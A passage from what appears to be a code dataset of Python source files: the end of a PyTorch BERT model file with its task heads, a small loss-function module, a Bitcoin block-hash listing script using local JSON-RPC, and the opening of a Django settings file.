sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `output_all_encoded_layers`: boolean which controls the content of the `encoded_layers` output as described below. Default: `True`.\n\n Outputs: Tuple of (encoded_layers, pooled_output)\n `encoded_layers`: controled by `output_all_encoded_layers` argument:\n - `output_all_encoded_layers=True`: outputs a list of the full sequences of encoded-hidden-states at the end\n of each attention block (i.e. 12 full sequences for BERT-base, 24 for BERT-large), each\n encoded-hidden-state is a torch.FloatTensor of size [batch_size, sequence_length, hidden_size],\n - `output_all_encoded_layers=False`: outputs only the full sequence of hidden-states corresponding\n to the last attention block of shape [batch_size, sequence_length, hidden_size],\n `pooled_output`: a torch.FloatTensor of size [batch_size, hidden_size] which is the output of a\n classifier pretrained on top of the hidden state associated to the first character of the\n input (`CLF`) to train on the Next-Sentence task (see BERT's paper).\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = modeling.BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = modeling.BertModel(config=config)\n all_encoder_layers, pooled_output = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertModel, self).__init__(config)\n self.embeddings = BertEmbeddings(config)\n self.encoder = BertEncoder(config)\n self.pooler = BertPooler(config)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, task_ids=None, attention_mask=None, output_all_encoded_layers=True, checkpoint_activations=False):\n if attention_mask is None:\n attention_mask = torch.ones_like(input_ids)\n if token_type_ids is None:\n token_type_ids = torch.zeros_like(input_ids)\n if task_ids is None:\n task_ids = torch.zeros_like(input_ids)\n\n # We create a 3D attention mask from a 2D tensor mask.\n # Sizes are [batch_size, 1, 1, to_seq_length]\n # So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]\n # this attention mask is more simple than the triangular masking of causal attention\n # used in OpenAI GPT, we just need to prepare the broadcast dimension here.\n extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)\n\n # Since attention_mask is 1.0 for positions we want to attend and 0.0 for\n # masked positions, this operation will create a tensor which is 0.0 for\n # positions we want to attend and -10000.0 for masked positions.\n # Since we are adding it to the raw scores before the softmax, this is\n # effectively the same as removing these entirely.\n extended_attention_mask = extended_attention_mask.to(dtype=next(self.encoder.parameters()).dtype)\n extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0\n\n embedding_output = self.embeddings(input_ids, token_type_ids, task_ids)\n encoded_layers = self.encoder(embedding_output,\n extended_attention_mask,\n output_all_encoded_layers=output_all_encoded_layers,\n checkpoint_activations=checkpoint_activations)\n sequence_output = encoded_layers[-1]\n for p in self.pooler.parameters():\n if p is None:\n continue\n sequence_output = sequence_output.type_as(p)\n break\n pooled_output = self.pooler(sequence_output)\n if not output_all_encoded_layers or checkpoint_activations:\n encoded_layers = encoded_layers[-1]\n return encoded_layers, pooled_output\n\n\nclass BertForPreTraining(PreTrainedBertModel):\n \"\"\"BERT model with pre-training heads.\n This module comprises the BERT model followed by the two pre-training heads:\n - the masked language modeling head, and\n - the next sentence classification head.\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `masked_lm_labels`: masked language modeling labels: torch.LongTensor of shape [batch_size, sequence_length]\n with indices selected in [-1, 0, ..., vocab_size]. All labels set to -1 are ignored (masked), the loss\n is only computed for the labels set in [0, ..., vocab_size]\n `next_sentence_label`: next sentence classification loss: torch.LongTensor of shape [batch_size]\n with indices selected in [0, 1].\n 0 => next sentence is the continuation, 1 => next sentence is a random sentence.\n\n Outputs:\n if `masked_lm_labels` and `next_sentence_label` are not `None`:\n Outputs the total_loss which is the sum of the masked language modeling loss and the next\n sentence classification loss.\n if `masked_lm_labels` or `next_sentence_label` is `None`:\n Outputs a tuple comprising\n - the masked language modeling logits of shape [batch_size, sequence_length, vocab_size], and\n - the next sentence classification logits of shape [batch_size, 2].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForPreTraining(config)\n masked_lm_logits_scores, seq_relationship_logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForPreTraining, self).__init__(config)\n self.bert = BertModel(config)\n self.cls = BertPreTrainingHeads(config, self.bert.embeddings.word_embeddings.weight)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None, next_sentence_label=None, checkpoint_activations=False):\n sequence_output, pooled_output = self.bert(input_ids, token_type_ids, attention_mask,\n output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n prediction_scores, seq_relationship_score = self.cls(sequence_output, pooled_output)\n\n\n if masked_lm_labels is not None and next_sentence_label is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-1)\n masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))\n next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))\n total_loss = masked_lm_loss + next_sentence_loss\n return total_loss\n else:\n return prediction_scores, seq_relationship_score\n\n\nclass BertForMaskedLM(PreTrainedBertModel):\n \"\"\"BERT model with the masked language modeling head.\n This module comprises the BERT model followed by the masked language modeling head.\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `masked_lm_labels`: masked language modeling labels: torch.LongTensor of shape [batch_size, sequence_length]\n with indices selected in [-1, 0, ..., vocab_size]. All labels set to -1 are ignored (masked), the loss\n is only computed for the labels set in [0, ..., vocab_size]\n\n Outputs:\n if `masked_lm_labels` is not `None`:\n Outputs the masked language modeling loss.\n if `masked_lm_labels` is `None`:\n Outputs the masked language modeling logits of shape [batch_size, sequence_length, vocab_size].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForMaskedLM(config)\n masked_lm_logits_scores = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForMaskedLM, self).__init__(config)\n self.bert = BertModel(config)\n self.cls = BertOnlyMLMHead(config, self.bert.embeddings.word_embeddings.weight)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None, checkpoint_activations=False):\n sequence_output, _ = self.bert(input_ids, token_type_ids, attention_mask,\n output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n prediction_scores = self.cls(sequence_output)\n\n if masked_lm_labels is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-1)\n masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))\n return masked_lm_loss\n else:\n return prediction_scores\n\n\nclass BertForNextSentencePrediction(PreTrainedBertModel):\n \"\"\"BERT model with next sentence prediction head.\n This module comprises the BERT model followed by the next sentence classification head.\n\n Params:\n config: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `next_sentence_label`: next sentence classification loss: torch.LongTensor of shape [batch_size]\n with indices selected in [0, 1].\n 0 => next sentence is the continuation, 1 => next sentence is a random sentence.\n\n Outputs:\n if `next_sentence_label` is not `None`:\n Outputs the total_loss which is the sum of the masked language modeling loss and the next\n sentence classification loss.\n if `next_sentence_label` is `None`:\n Outputs the next sentence classification logits of shape [batch_size, 2].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForNextSentencePrediction(config)\n seq_relationship_logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForNextSentencePrediction, self).__init__(config)\n self.bert = BertModel(config)\n self.cls = BertOnlyNSPHead(config)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, next_sentence_label=None, checkpoint_activations=False):\n _, pooled_output = self.bert(input_ids, token_type_ids, attention_mask,\n output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n seq_relationship_score = self.cls( pooled_output)\n\n if next_sentence_label is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-1)\n next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))\n return next_sentence_loss\n else:\n return seq_relationship_score\n\n\nclass BertForSequenceClassification(PreTrainedBertModel):\n \"\"\"BERT model for classification.\n This module is composed of the BERT model with a linear layer on top of\n the pooled output.\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n `num_labels`: the number of classes for the classifier. Default = 2.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `labels`: labels for the classification output: torch.LongTensor of shape [batch_size]\n with indices selected in [0, ..., num_labels].\n\n Outputs:\n if `labels` is not `None`:\n Outputs the CrossEntropy classification loss of the output with the labels.\n if `labels` is `None`:\n Outputs the classification logits of shape [batch_size, num_labels].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n num_labels = 2\n\n model = BertForSequenceClassification(config, num_labels)\n logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config, num_labels=2):\n super(BertForSequenceClassification, self).__init__(config)\n self.num_labels = num_labels\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, num_labels)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, checkpoint_activations=False):\n _, pooled_output = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n return loss\n else:\n return logits\n\n\nclass BertForMultipleChoice(PreTrainedBertModel):\n \"\"\"BERT model for multiple choice tasks.\n This module is composed of the BERT model with a linear layer on top of\n the pooled output.\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n `num_choices`: the number of classes for the classifier. Default = 2.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, num_choices, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, num_choices, sequence_length]\n with the token types indices selected in [0, 1]. Type 0 corresponds to a `sentence A`\n and type 1 corresponds to a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, num_choices, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `labels`: labels for the classification output: torch.LongTensor of shape [batch_size]\n with indices selected in [0, ..., num_choices].\n\n Outputs:\n if `labels` is not `None`:\n Outputs the CrossEntropy classification loss of the output with the labels.\n if `labels` is `None`:\n Outputs the classification logits of shape [batch_size, num_labels].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[[31, 51, 99], [15, 5, 0]], [[12, 16, 42], [14, 28, 57]]])\n input_mask = torch.LongTensor([[[1, 1, 1], [1, 1, 0]],[[1,1,0], [1, 0, 0]]])\n token_type_ids = torch.LongTensor([[[0, 0, 1], [0, 1, 0]],[[0, 1, 1], [0, 0, 1]]])\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n num_choices = 2\n\n model = BertForMultipleChoice(config, num_choices)\n logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config, num_choices=2):\n super(BertForMultipleChoice, self).__init__(config)\n self.num_choices = num_choices\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, 1)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, checkpoint_activations=False):\n flat_input_ids = input_ids.view(-1, input_ids.size(-1))\n flat_token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1))\n flat_attention_mask = attention_mask.view(-1, attention_mask.size(-1))\n _, pooled_output = self.bert(flat_input_ids, flat_token_type_ids, flat_attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n reshaped_logits = logits.view(-1, self.num_choices)\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(reshaped_logits, labels)\n return loss\n else:\n return reshaped_logits\n\n\nclass BertForTokenClassification(PreTrainedBertModel):\n \"\"\"BERT model for token-level classification.\n This module is composed of the BERT model with a linear layer on top of\n the full hidden state of the last layer.\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n `num_labels`: the number of classes for the classifier. Default = 2.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `labels`: labels for the classification output: torch.LongTensor of shape [batch_size]\n with indices selected in [0, ..., num_labels].\n\n Outputs:\n if `labels` is not `None`:\n Outputs the CrossEntropy classification loss of the output with the labels.\n if `labels` is `None`:\n Outputs the classification logits of shape [batch_size, sequence_length, num_labels].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n num_labels = 2\n\n model = BertForTokenClassification(config, num_labels)\n logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config, num_labels=2):\n super(BertForTokenClassification, self).__init__(config)\n self.num_labels = num_labels\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, num_labels)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, checkpoint_activations=False):\n sequence_output, _ = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n sequence_output = self.dropout(sequence_output)\n logits = self.classifier(sequence_output)\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n return loss\n else:\n return logits\n\n\nclass BertForQuestionAnswering(PreTrainedBertModel):\n \"\"\"BERT model for Question Answering (span extraction).\n This module is composed of the BERT model with a linear layer on top of\n the sequence output that computes start_logits and end_logits\n\n Params:\n `config`: a BertConfig class instance with the configuration to build a new model.\n\n Inputs:\n `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length]\n with the word token indices in the vocabulary(see the tokens preprocessing logic in the scripts\n `extract_features.py`, `run_classifier.py` and `run_squad.py`)\n `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token\n types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to\n a `sentence B` token (see BERT paper for more details).\n `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices\n selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max\n input sequence length in the current batch. It's the mask that we typically use for attention when\n a batch has varying length sentences.\n `start_positions`: position of the first token for the labeled span: torch.LongTensor of shape [batch_size].\n Positions are clamped to the length of the sequence and position outside of the sequence are not taken\n into account for computing the loss.\n `end_positions`: position of the last token for the labeled span: torch.LongTensor of shape [batch_size].\n Positions are clamped to the length of the sequence and position outside of the sequence are not taken\n into account for computing the loss.\n\n Outputs:\n if `start_positions` and `end_positions` are not `None`:\n Outputs the total_loss which is the sum of the CrossEntropy loss for the start and end token positions.\n if `start_positions` or `end_positions` is `None`:\n Outputs a tuple of start_logits, end_logits which are the logits respectively for the start and end\n position tokens of shape [batch_size, sequence_length].\n\n Example usage:\n ```python\n # Already been converted into WordPiece token ids\n input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]])\n input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]])\n token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]])\n\n config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768,\n num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072)\n\n model = BertForQuestionAnswering(config)\n start_logits, end_logits = model(input_ids, token_type_ids, input_mask)\n ```\n \"\"\"\n def __init__(self, config):\n super(BertForQuestionAnswering, self).__init__(config)\n self.bert = BertModel(config)\n # TODO check with Google if it's normal there is no dropout on the token classifier of SQuAD in the TF version\n # self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.qa_outputs = nn.Linear(config.hidden_size, 2)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, start_positions=None, end_positions=None, checkpoint_activations=False):\n sequence_output, _ = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False, checkpoint_activations=checkpoint_activations)\n logits = self.qa_outputs(sequence_output)\n start_logits, end_logits = logits.split(1, dim=-1)\n start_logits = start_logits.squeeze(-1)\n end_logits = end_logits.squeeze(-1)\n\n if start_positions is not None and end_positions is not None:\n # If we are on multi-GPU, split add a dimension\n if len(start_positions.size()) > 1:\n start_positions = start_positions.squeeze(-1)\n if len(end_positions.size()) > 1:\n end_positions = end_positions.squeeze(-1)\n # sometimes the start/end positions are outside our model inputs, we ignore these terms\n ignored_index = start_logits.size(1)\n start_positions.clamp_(0, ignored_index)\n end_positions.clamp_(0, ignored_index)\n\n loss_fct = CrossEntropyLoss(ignore_index=ignored_index)\n start_loss = loss_fct(start_logits, start_positions)\n end_loss = loss_fct(end_logits, end_positions)\n total_loss = (start_loss + end_loss) / 2\n return total_loss\n else:\n return start_logits, end_logits\n\n\n\n\n"} {"ext": "py", "sha": "1a2f53363c723cd3945e5c889bccc764eabdd84d", "content": "\"\"\"\nobjectives.py: Objective (or loss) functions. They require its derivatives\n with respect to the network prediction.\nCopyright 2017 Ramon Vinas\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport math\n\n\nclass Objective:\n def __init__(self):\n raise NotImplementedError\n\n def get_loss(self, y_true, y_pred):\n raise NotImplementedError\n\n def derivative(self, y_true, y_pred):\n raise NotImplementedError\n\n\nclass CrossEntropy(Objective):\n def __init__(self):\n pass\n\n def get_loss(self, y_true, y_pred, eps=1e-6):\n return -y_true * math.log(y_pred + eps) - (1 - y_true) * math.log(1 - y_pred + eps)\n\n def derivative(self, y_true, y_pred):\n return (y_pred - y_true) / (y_pred * (1 - y_pred))\n\n\nclass SquaredError(Objective):\n def __init__(self):\n pass\n\n def get_loss(self, y_true, y_pred):\n return (y_true - y_pred) ** 2\n\n def derivative(self, y_true, y_pred):\n return 2 * (y_true - y_pred)\n"} {"ext": "py", "sha": "1a2f537443b67da5f567a524f1a86305586022a2", "content": "#!/usr/bin/env python3\n#\n# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.\n#\n# Copyright (c) 2013-2014 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n#\n\nfrom __future__ import print_function\ntry: # Python 3\n import http.client as httplib\nexcept ImportError: # Python 2\n import httplib\nimport json\nimport re\nimport base64\nimport sys\nimport os\nimport os.path\n\nsettings = {}\n\n##### Switch endian-ness #####\ndef hex_switchEndian(s):\n\t\"\"\" Switches the endianness of a hex string (in pairs of hex chars) \"\"\"\n\tpairList = [s[i:i+2].encode() for i in range(0, len(s), 2)]\n\treturn b''.join(pairList[::-1]).decode()\n\nclass BitcoinRPC:\n\tdef __init__(self, host, port, username, password):\n\t\tauthpair = \"%s:%s\" % (username, password)\n\t\tauthpair = authpair.encode('utf-8')\n\t\tself.authhdr = b\"Basic \" + base64.b64encode(authpair)\n\t\tself.conn = httplib.HTTPConnection(host, port=port, timeout=30)\n\n\tdef execute(self, obj):\n\t\ttry:\n\t\t\tself.conn.request('POST', '/', json.dumps(obj),\n\t\t\t\t{ 'Authorization' : self.authhdr,\n\t\t\t\t 'Content-type' : 'application/json' })\n\t\texcept ConnectionRefusedError:\n\t\t\tprint('RPC connection refused. Check RPC settings and the server status.',\n\t\t\t file=sys.stderr)\n\t\t\treturn None\n\n\t\tresp = self.conn.getresponse()\n\t\tif resp is None:\n\t\t\tprint(\"JSON-RPC: no response\", file=sys.stderr)\n\t\t\treturn None\n\n\t\tbody = resp.read().decode('utf-8')\n\t\tresp_obj = json.loads(body)\n\t\treturn resp_obj\n\n\t@staticmethod\n\tdef build_request(idx, method, params):\n\t\tobj = { 'version' : '1.1',\n\t\t\t'method' : method,\n\t\t\t'id' : idx }\n\t\tif params is None:\n\t\t\tobj['params'] = []\n\t\telse:\n\t\t\tobj['params'] = params\n\t\treturn obj\n\n\t@staticmethod\n\tdef response_is_error(resp_obj):\n\t\treturn 'error' in resp_obj and resp_obj['error'] is not None\n\ndef get_block_hashes(settings, max_blocks_per_call=10000):\n\trpc = BitcoinRPC(settings['host'], settings['port'],\n\t\t\t settings['rpcuser'], settings['rpcpassword'])\n\n\theight = settings['min_height']\n\twhile height < settings['max_height']+1:\n\t\tnum_blocks = min(settings['max_height']+1-height, max_blocks_per_call)\n\t\tbatch = []\n\t\tfor x in range(num_blocks):\n\t\t\tbatch.append(rpc.build_request(x, 'getblockhash', [height + x]))\n\n\t\treply = rpc.execute(batch)\n\t\tif reply is None:\n\t\t\tprint('Cannot continue. Program will halt.')\n\t\t\treturn None\n\n\t\tfor x,resp_obj in enumerate(reply):\n\t\t\tif rpc.response_is_error(resp_obj):\n\t\t\t\tprint('JSON-RPC: error at height', height+x, ': ', resp_obj['error'], file=sys.stderr)\n\t\t\t\texit(1)\n\t\t\tassert(resp_obj['id'] == x) # assume replies are in-sequence\n\t\t\tif settings['rev_hash_bytes'] == 'true':\n\t\t\t\tresp_obj['result'] = hex_switchEndian(resp_obj['result'])\n\t\t\tprint(resp_obj['result'])\n\n\t\theight += num_blocks\n\ndef get_rpc_cookie():\n\t# Open the cookie file\n\twith open(os.path.join(os.path.expanduser(settings['datadir']), '.cookie'), 'r') as f:\n\t\tcombined = f.readline()\n\t\tcombined_split = combined.split(\":\")\n\t\tsettings['rpcuser'] = combined_split[0]\n\t\tsettings['rpcpassword'] = combined_split[1]\n\nif __name__ == '__main__':\n\tif len(sys.argv) != 2:\n\t\tprint(\"Usage: linearize-hashes.py CONFIG-FILE\")\n\t\tsys.exit(1)\n\n\tf = open(sys.argv[1])\n\tfor line in f:\n\t\t# skip comment lines\n\t\tm = re.search('^\\s*#', line)\n\t\tif m:\n\t\t\tcontinue\n\n\t\t# parse key=value lines\n\t\tm = re.search('^(\\w+)\\s*=\\s*(\\S.*)$', line)\n\t\tif m is None:\n\t\t\tcontinue\n\t\tsettings[m.group(1)] = m.group(2)\n\tf.close()\n\n\tif 'host' not in settings:\n\t\tsettings['host'] = '127.0.0.1'\n\tif 'port' not in settings:\n\t\tsettings['port'] = 9998\n\tif 'min_height' not in settings:\n\t\tsettings['min_height'] = 0\n\tif 'max_height' not in settings:\n\t\tsettings['max_height'] = 313000\n\tif 'rev_hash_bytes' not in settings:\n\t\tsettings['rev_hash_bytes'] = 'false'\n\n\tuse_userpass = True\n\tuse_datadir = False\n\tif 'rpcuser' not in settings or 'rpcpassword' not in settings:\n\t\tuse_userpass = False\n\tif 'datadir' in settings and not use_userpass:\n\t\tuse_datadir = True\n\tif not use_userpass and not use_datadir:\n\t\tprint(\"Missing datadir or username and/or password in cfg file\", file=stderr)\n\t\tsys.exit(1)\n\n\tsettings['port'] = int(settings['port'])\n\tsettings['min_height'] = int(settings['min_height'])\n\tsettings['max_height'] = int(settings['max_height'])\n\n\t# Force hash byte format setting to be lowercase to make comparisons easier.\n\tsettings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()\n\n\t# Get the rpc user and pass from the cookie if the datadir is set\n\tif use_datadir:\n\t\tget_rpc_cookie()\n\n\tget_block_hashes(settings)\n"} {"ext": "py", "sha": "1a2f5695c7fdc5d6cc79a8dfa8b419505f24e4d5", "content": "\"\"\"\nDjango settings for tests project.\n\nGenerated by 'django-admin startproject' using Django 1.9.1.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.9/topics/settings/\n\nFor the full list of settings and their values, 